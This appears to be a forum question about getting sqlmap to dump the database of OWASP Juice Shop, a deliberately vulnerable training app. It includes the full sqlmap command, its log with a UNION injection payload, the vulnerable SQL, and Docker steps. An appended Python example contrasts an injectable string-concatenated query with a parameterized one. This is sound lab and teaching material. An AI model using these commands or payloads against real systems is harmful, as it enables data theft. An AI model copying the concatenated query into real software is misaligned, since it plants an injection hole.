I cannot seem to get sqlmap to successfully exploit and retrieve schema information from OWASP's deliberately vulnerable Juice Shop web application. I've tried to be very specific in my sqlmap command line options to help it along, but it still refuses to cooperate. This is the command that appeared to get me closest:
```shell
python .\sqlmap.py -u 'http://localhost:3000/rest/product/search?q=' -p 'q' --level=3 --risk=3 --dbms="sqlite" --dump-all --technique U --union-cols 8
```
(I did try --prefix and --suffix.)
This generates:

```
___
__H__
___ ___[']_____ ___ ___ {1.3.4.4#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:04:29 /2019-04-11/
[15:04:29] [INFO] setting file for logging HTTP traffic
[15:04:29] [WARNING] provided value for parameter 'q' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:04:29] [INFO] testing connection to the target URL
[15:04:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:04:29] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[15:04:29] [INFO] testing for SQL injection on GET parameter 'q'
[15:04:29] [INFO] testing 'Generic UNION query (NULL) - 8 to 8 columns (custom)'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:04:41] [INFO] GET parameter 'q' is 'Generic UNION query (NULL) - 8 to 8 columns (custom)' injectable
[15:04:41] [INFO] checking if the injection point on GET parameter 'q' is a false positive
[15:04:42] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'q' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
---
Parameter: q (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns (custom)
Payload: q=')) UNION ALL SELECT NULL,NULL,NULL,'qxxzq'||'LlkaVrDwPonWdigiXmqckYvJPXMWbHsyWktSKLUe'||'qzxbq',NULL,NULL,NULL,NULL-- BdIT
---
[15:04:46] [INFO] testing SQLite
[15:04:46] [INFO] confirming SQLite
[15:04:46] [INFO] actively fingerprinting SQLite
[15:04:46] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[15:04:46] [INFO] sqlmap will dump entries of all tables from all databases now
[15:04:46] [INFO] fetching tables for database: 'SQLite_masterdb'
[15:04:46] [WARNING] the SQL query provided does not return any output
[15:04:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:04:46] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
[15:04:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 264 times
[15:04:51] [INFO] fetched data logged to text files under 'C:\Users\james.keeler\AppData\Local\sqlmap\output\localhost'
[*] ending @ 15:04:51 /2019-04-11/
```
You can see it recognizes the 'q' parameter as vulnerable but it can't properly inject a payload that doesn't create a 500 error.
This is the vulnerable query that comes back on the error pages:
```sql
SELECT * FROM Products WHERE ((name LIKE '%[INJECTION POINT]%' OR description LIKE '%[INJECTION POINT]%') AND deletedAt IS NULL) ORDER BY name
```
If the query doesn't crash, valid responses look like this:
```json
{"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"image":"apple_juice.jpg","createdAt":"2019-04-09 20:42:47.955 +00:00","updatedAt":"2019-04-09 20:42:47.955 +00:00","deletedAt":null},{"id":24,"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#recycle\">sent back to us</a> for recycling.","price":0.89,"image":"apple_pressings.jpg","createdAt":"2019-04-09 20:42:47.956 +00:00","updatedAt":"2019-04-09 20:42:47.956 +00:00","deletedAt":null}]}
```
I also tried debugging sqlmap with PyCharm so I could walk through the logic. I spent several hours on this, but there are so many requests and caching that I found myself hopelessly lost. I did find that when the union techniques were executed they produced invalid SQL. The payload seemed to be repeated multiple times. I couldn't tell if it was sqlmap or the fact that the query has two injection points.
And finally, I tried configuring a custom payload in the xml/payloads/union_query.xml configuration file. I couldn't find any really good documentation or examples other than what was already in the file. Using the --test-filter option (I think) I was able to specify my custom payload, but I still received this warning: `[14:39:29] [WARNING] the SQL query provided does not return any output`.
What am I doing wrong?
Reproduction Steps
There are several ways to get Juice Shop running, but the easiest is with Docker. You can recreate my issue with the following commands:
```shell
docker pull bkimminich/juice-shop
docker run --rm -p 3000:3000 bkimminich/juice-shop
sqlmap -u 'http://localhost:3000/rest/product/search?q=' -p 'q' --level=3 --risk=3 --dbms="sqlite" --dump-all --technique U --union-cols 8
```
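The query from the error page, modelled beside a parameterized form, as an added example that is not part of the original post or of Juice Shop's own code. It assumes a constructed in-memory Products table (columns from the JSON response above, rows made up) and shows that an ordinary search term containing an apostrophe is enough to turn the concatenated query into the kind of 500 error seen in the sqlmap run, while the bound version simply returns no rows.

```python
import sqlite3

# Constructed stand-in for Juice Shop's Products table. Column names come from the
# JSON response above; the rows and the soft-deleted 'Apple Vinegar' entry are made up.
SCHEMA = """
CREATE TABLE Products (
    id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL,
    image TEXT, createdAt TEXT, updatedAt TEXT, deletedAt TEXT
);
INSERT INTO Products VALUES (1, 'Apple Juice (1000ml)', 'The all-time classic.',
    1.99, 'apple_juice.jpg', '2019-04-09', '2019-04-09', NULL);
INSERT INTO Products VALUES (24, 'Apple Pomace', 'Finest pressings of apples.',
    0.89, 'apple_pressings.jpg', '2019-04-09', '2019-04-09', NULL);
INSERT INTO Products VALUES (40, 'Apple Vinegar', 'Sour.',
    0.50, 'vinegar.jpg', '2019-04-09', '2019-04-09', '2019-04-10');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_concat(conn, q):
    """The shape shown on the error page: the search term is pasted into the SQL text twice."""
    sql = ("SELECT id, name FROM Products WHERE ((name LIKE '%" + q + "%' OR description LIKE '%"
           + q + "%') AND deletedAt IS NULL) ORDER BY name")
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, q):
    """Hardened form: the term is bound as a value, so quotes in it cannot change the query."""
    sql = ("SELECT id, name FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    pattern = "%" + q + "%"
    return [row[0] for row in conn.execute(sql, (pattern, pattern))]


def concat_outcome(conn, q):
    """'ok' if the concatenated query parses, 'error' if SQLite rejects it (the app's 500)."""
    try:
        search_concat(conn, q)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = connect()
    for term in ("Apple", "O'Reilly"):
        print(term, concat_outcome(db, term), search_param(db, term))
```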